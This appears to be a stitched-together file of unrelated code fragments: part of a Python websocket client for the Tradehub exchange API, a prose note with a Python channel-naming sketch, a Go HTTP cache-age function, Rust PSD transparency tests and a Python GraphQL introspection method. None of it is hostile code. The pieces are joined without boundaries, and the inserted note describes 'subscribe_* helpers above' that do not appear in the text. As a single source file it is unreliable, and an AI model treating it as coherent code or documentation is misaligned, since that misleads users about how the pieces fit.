Expect almost none or just a few candles with a low granularity. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param market: Tradehub market identifier, e.g. 'swth_eth1' :param granularity: Define the candlesticks granularity. Allowed values: 1, 5, 15, 30, 60, 360, 1440. :param from_epoch: Starting from epoch seconds. :param to_epoch: Ending to epoch seconds. :return: None """ if granularity not in [1, 5, 15, 30, 60, 360, 1440]: raise ValueError(f"Granularity '{granularity}' not supported. Allowed values: 1, 5, 15, 30, 60, 360, 1440") await self.send({ "id": message_id, "method": "get_candlesticks", "params": { "market": market, "resolution": str(granularity), "from": str(from_epoch), "to": str(to_epoch) } }) async def get_open_orders(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Request open orders. Example:: ws_client.get_open_orders('open_orders', "swth1p5hjhag5glkpqaj0y0vn3au7x0vz33k0gxuejk") The expected return result for this function is as follows:: { "id": "open_orders", "result": [ { "order_id": "A7C488A6AE25249E90523FCD603236342025340E3DCAE6A6312133905C41794C", "block_height": 7564973, "triggered_block_height": 0, "address": "swth1p5hjhag5glkpqaj0y0vn3au7x0vz33k0gxuejk", "market": "swth_eth1", "side": "sell", "price": "0.0000181", "quantity": "58806", "available": "58806", "filled": "0", "order_status": "open", "order_type": "limit", "initiator": "amm", "time_in_force": "gtc", "stop_price": "0", "trigger_type": "", "allocated_margin_denom": "swth", "allocated_margin_amount": "0", "is_liquidation": false, "is_post_only": false, "is_reduce_only": false, "type": "", "block_created_at": "2021-02-16T10:30:27.079962Z", "username": "", "id": "2316597" }, ... ] } .. note:: The market identifier is optional and acts as a filter. 
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ await self.send({ "id": message_id, "method": "get_open_orders", "params": { "address": swth_address, "market": market } }) async def get_account_trades(self, message_id: str, swth_address: str, market: Optional[str] = None, page: Optional[int] = None): """ Request up to 100 account trades. Example:: ws_client.get_account_trades('account_trades', 'swth1vaavrkrm7usqg9hcwhqh2hev9m3nryw7aera8p') The expected return result for this function is as follows:: { "id": "account_trades", "result": [ { "base_precision": 8, "quote_precision": 6, "fee_precision": 6, "order_id": "C7D7DDDCFDC68DF2D078CBD8630B657148893AC24CF8DB8F2E23293C6EDC90AD", "market": "wbtc1_usdc1", "side": "sell", "quantity": "0.0001", "price": "48745.12", "fee_amount": "0.004875", "fee_denom": "usdc1", "address": "swth1vaavrkrm7usqg9hcwhqh2hev9m3nryw7aera8p", "block_height": "7561537", "block_created_at": "2021-02-16T08:31:13.225303Z", "id": 289733 }, ... ] } .. note:: The market identifier is optional and acts as a filter. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1'. :param page: Used for pagination. 
:return: None """ await self.send({ "id": message_id, "method": "get_account_trades", "params": { "address": swth_address, "market": market, "page": str(page) if page else None } }) async def get_market_stats(self, message_id: str, market: Optional[str] = None): """ Request market stats. Example:: ws_client.get_market_stats('market_stats') The expected return result for this function is as follows:: { "id": "market_stats", "result": { "eth1_usdc1": { "day_high": "1818.51", "day_low": "1751.81", "day_open": "1760.07", "day_close": "1788.19", "day_volume": "36.503", "day_quote_volume": "65153.50224", "index_price": "0", "mark_price": "0", "last_price": "1788.19", "market": "eth1_usdc1", "market_type": "spot", "open_interest": "0" }, ... } } .. warning:: Parameter 'market' has no effect. Maybe not intended as parameter. Request will result in all market stats. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ # TODO market has no effect await self.send({ "id": message_id, "method": "get_market_stats", "params": { "market": market } }) async def get_leverages(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Request leverages. .. note:: The market identifier is optional and acts as a filter. .. warning:: The request method has not been tested yet. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1'. 
:return: None """ # TODO not tested yet await self.send({ "id": message_id, "method": "get_leverages", "params": { "address": swth_address, "market": market } }) async def get_open_positions(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Request open positions. .. note:: The market identifier is optional and acts as a filter. .. warning:: The request method has not been tested yet. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1'. :return: None """ # TODO not tested yet await self.send({ "id": message_id, "method": "get_open_positions", "params": { "address": swth_address, "market": market } }) async def get_closed_positions(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Request closed positions. .. note:: The market identifier is optional and acts as a filter. .. warning:: The request method has not been tested yet. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1'. :return: None """ # TODO not tested yet await self.send({ "id": message_id, "method": "get_closed_positions", "params": { "address": swth_address, "market": market } }) async def send(self, data: dict): """ Send data to websocket server. Provided data will be translated to json. :param data: data as dictionary. :return: """ await self._websocket.send(json.dumps(data)) def open(self) -> bool: """ Check if the connection is open. 
:return: Bool """ if not self._websocket: return False return self._websocket.open async def disconnect(self): """ Safely close the websocket connection. :return: """ if self._websocket: await self._websocket.close() async def connect(self, on_receive_message_callback: Callable, on_connect_callback: Optional[Callable] = None, on_error_callback: Optional[Callable] = None): """ Connect to websocket server. .. warning:: Callbacks need to be NON-BLOCKING! Otherwise the PING-PONG coroutine is blocked and the server will close the connection. You will not receive any notification about this. :param on_receive_message_callback: async callback which is called with the received message as dict. :param on_connect_callback: async callback which is called if websocket is connected. :param on_error_callback: async callback which is called if websocket has an error. :return: None """ try: async with websockets.connect(self._uri, ping_interval=self._ping_interval, ping_timeout=self._ping_timeout) as websocket: self._websocket = websocket if on_connect_callback: await on_connect_callback() async for message in websocket: data = json.loads(message) await on_receive_message_callback(data) except Exception as e: if on_error_callback: await on_error_callback(e) else: raise e
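Every `subscribe_*` helper above reduces to assembling a dotted channel name and passing it to `subscribe`. As a quick reference, the naming scheme can be sketched as standalone functions (the function names here are illustrative, not part of the API; the string patterns are taken from the methods above):

```python
# Standalone sketch of the channel naming scheme used by the subscribe_* helpers.

def orders_channel(swth_address: str, market: str = None) -> str:
    # subscribe_orders: the optional market acts as a filter
    if market:
        return f"orders_by_market.{market}.{swth_address}"
    return f"orders.{swth_address}"

def books_channel(market: str) -> str:
    # subscribe_books: one channel per market
    return f"books.{market}"

def candlesticks_channel(market: str, granularity: int) -> str:
    # subscribe_candlesticks: granularity must be one of the supported resolutions
    if granularity not in (1, 5, 15, 30, 60, 360, 1440):
        raise ValueError(f"Granularity '{granularity}' not supported.")
    return f"candlesticks.{market}.{granularity}"

print(orders_channel("swth1abcd"))                # orders.swth1abcd
print(orders_channel("swth1abcd", "eth1_usdc1"))  # orders_by_market.eth1_usdc1.swth1abcd
print(books_channel("swth_eth1"))                 # books.swth_eth1
print(candlesticks_channel("swth_eth1", 5))       # candlesticks.swth_eth1.5
```

Keeping the naming in one place like this also makes it easy to match an incoming `channel` field back to the subscription that produced it.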
// CorrectedAge adjusts the age of a resource for clock skew and travel time func CorrectedAge(h http.Header, reqTime, respTime time.Time) (time.Duration, error) { date, err := timeHeader("Date", h) if err != nil { return time.Duration(0), err } apparentAge := respTime.Sub(date) if apparentAge < 0 { apparentAge = 0 } respDelay := respTime.Sub(reqTime) ageSeconds, err := intHeader("Age", h) if err != nil { return time.Duration(0), err } age := time.Second * time.Duration(ageSeconds) correctedAge := age + respDelay if apparentAge > correctedAge { correctedAge = apparentAge } residentTime := Clock().Sub(respTime) currentAge := correctedAge + residentTime return currentAge, nil }
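`CorrectedAge` implements the current-age calculation from RFC 7234, section 4.2.3: the apparent age from the `Date` header (clamped at zero), corrected by the `Age` header plus the response delay, plus the time the response has been resident in the cache. The same arithmetic in a small Python sketch (function and variable names are mine, mirroring the Go code):

```python
from datetime import datetime, timedelta

def corrected_age(date: datetime, age_header: int,
                  req_time: datetime, resp_time: datetime,
                  now: datetime) -> timedelta:
    """Mirror of the Go CorrectedAge logic (RFC 7234 current_age)."""
    apparent_age = max(resp_time - date, timedelta(0))  # clamp clock skew to zero
    resp_delay = resp_time - req_time                   # request/response travel time
    corrected = timedelta(seconds=age_header) + resp_delay
    corrected = max(corrected, apparent_age)
    resident_time = now - resp_time                     # time spent in our cache
    return corrected + resident_time

t0 = datetime(2021, 1, 1, 12, 0, 0)
age = corrected_age(date=t0, age_header=5,
                    req_time=t0, resp_time=t0 + timedelta(seconds=2),
                    now=t0 + timedelta(seconds=10))
print(age.total_seconds())  # 15.0: (5 + 2) corrected initial age + 8 resident
```

Taking the maximum of apparent age and Age-header-based age makes the estimate conservative when intermediate caches under-report age or clocks disagree.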
use failure::Error; use psd::Psd; use psd::PsdChannelCompression; use psd::PsdChannelKind; use std::collections::HashMap; const RED_PIXEL: [u8; 4] = [255, 0, 0, 255]; // const GREEN_PIXEL: [u8; 4] = [0, 255, 0, 255]; const BLUE_PIXEL: [u8; 4] = [0, 0, 255, 255]; // Transparent pixels in the image data section start [255, 255, 255, 0] // const TRANSPARENT_PIXEL_IMAGE_DATA: [u8; 4] = [255, 255, 255, 0]; // In the layer and mask info section we fill in transparent rgba pixels ourselves as [0, 0, 0, 0] // const TRANSPARENT_PIXEL_LAYER: [u8; 4] = [0, 0, 0, 0]; // Test that images that have transparent pixels and don't use compression // return the correct RGBA #[test] fn transparency_raw_data() -> Result<(), failure::Error> { let psd = include_bytes!("./fixtures/3x3-opaque-center.psd"); let psd = Psd::from_bytes(psd)?; let blue_pixels = vec![(1, 1, BLUE_PIXEL), (2, 0, BLUE_PIXEL)]; assert_colors(psd.rgba(), &psd, &blue_pixels); assert_colors( psd.layer_by_name("OpaqueCenter")?.rgba()?, &psd, &blue_pixels, ); Ok(()) } // Test that images that have transparent pixels and use rle compression // return the correct RGBA #[test] fn transparency_rle_compressed() -> Result<(), failure::Error> { let psd = include_bytes!("./fixtures/16x16-rle-partially-opaque.psd"); let psd = Psd::from_bytes(psd)?; let mut red_block = vec![]; for left in 0..9 { for top in 0..9 { red_block.push((left + 1, top + 1, RED_PIXEL)); } } assert_eq!(psd.compression(), &PsdChannelCompression::RleCompressed); assert_colors(psd.rgba(), &psd, &red_block); assert_eq!( psd.layer_by_name("OpaqueCenter")? .compression(PsdChannelKind::Red)?, PsdChannelCompression::RleCompressed ); assert_colors(psd.layer_by_name("OpaqueCenter")?.rgba()?, &psd, &red_block); Ok(()) } // Fixes an `already borrowed: BorrowMutError` that we were getting in the `flattened_pixel` // method when we were recursing into the method and trying to borrow when we'd already borrowed.
#[test] fn transparent_above_opaque() -> Result<(), Error> { let psd = include_bytes!("./fixtures/transparent-above-opaque.psd"); let psd = Psd::from_bytes(psd)?; let image = psd.flatten_layers_rgba(&|_| true)?; assert_eq!(image[0..4], BLUE_PIXEL); Ok(()) } // Ensure that the specified, zero-indexed left, top coordinate has the provided pixel color. // Otherwise it should be fully transparent. // (left, top, pixel) fn assert_colors(image: Vec<u8>, psd: &Psd, assertions: &[(usize, usize, [u8; 4])]) { let pixel_count = (psd.width() * psd.height()) as usize; let width = psd.width() as usize; let mut asserts = HashMap::new(); for assertion in assertions { asserts.insert((assertion.0, assertion.1), assertion.2); } for idx in 0..pixel_count { let left = idx % width; let top = idx / width; let pixel_color = &image[idx * 4..idx * 4 + 4]; match asserts.get(&(left, top)) { Some(expected_color) => { assert_eq!(expected_color, pixel_color); } None => { assert_eq!(pixel_color[3], 0, "Pixel should be transparent"); } }; } } fn make_image(pixel: [u8; 4], pixel_count: u32) -> Vec<u8> { let pixel_count = pixel_count as usize; let mut image = vec![0; pixel_count * 4]; for idx in 0..pixel_count { image[idx * 4] = pixel[0]; image[idx * 4 + 1] = pixel[1]; image[idx * 4 + 2] = pixel[2]; image[idx * 4 + 3] = pixel[3]; } image } fn put_pixel(image: &mut Vec<u8>, width: usize, left: usize, top: usize, new: [u8; 4]) { let idx = (top * width) + left; image[idx * 4] = new[0]; image[idx * 4 + 1] = new[1]; image[idx * 4 + 2] = new[2]; image[idx * 4 + 3] = new[3]; }
async def introspect( self, headers: Optional[Dict[str, str]] = None ) -> graphql.GraphQLSchema: request = GraphQLRequest( query=graphql.get_introspection_query(descriptions=False), validate=False, headers=headers, ) introspection = await self.query(request) try: return graphql.build_client_schema(introspection=introspection.data) except TypeError: raise GraphQLIntrospectionException( f"Failed to build schema from introspection data: {introspection.errors}" )